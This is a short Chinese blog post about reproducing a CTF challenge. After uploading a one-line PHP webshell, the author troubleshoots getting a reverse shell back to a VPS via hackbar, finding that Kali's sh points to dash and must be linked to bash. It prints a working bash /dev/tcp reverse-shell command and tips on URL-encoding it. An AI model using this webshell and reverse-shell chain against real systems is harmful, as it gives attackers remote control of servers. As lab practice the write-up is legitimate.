在复现一个CTF题时,上传上去了一句话木马,但是不允许用菜刀连接,所以我是想vps上监听一个端口,然后直接用hackbar反弹shell,结果死活反弹不回来。而在我印象中是有直接使用hackbar反弹shell成功的前例。因而有了此篇文章。
刚开始是在kali上测试的,也是死活谈不回来
正常的反弹命令:bash -i >&/dev/tcp/192.168.1.103/123 0>&1
然后由于是在post中,所以需要给&编码,变成%26,可是还是弹不回来???
后来试着在kali终端中直接执行这条命令,没问题,能弹回来
然后写了一个php脚本,内容如下:
然后,执行该脚本,他丫的居然报错了???
我去?什么鬼?
后来在Centos7中创建了同样的一个脚本,执行得到如下结果:
这个为啥就成功弹回来了???不科学伐!!!
经过测试得到,Centos7中可以弹回shell,而kali就是不行!!!
后来网上搜索了一下解决方法,是因为ubuntu从6.10开始,默认使用dash(登录还是用bash),因为dash更快更高效。只要把bash链接到sh即可。。。
可以看到kali中确实sh默认是链接的dash
将bash链接到sh后,再次执行该脚本
|
|
然后就可以成功的弹回shell了
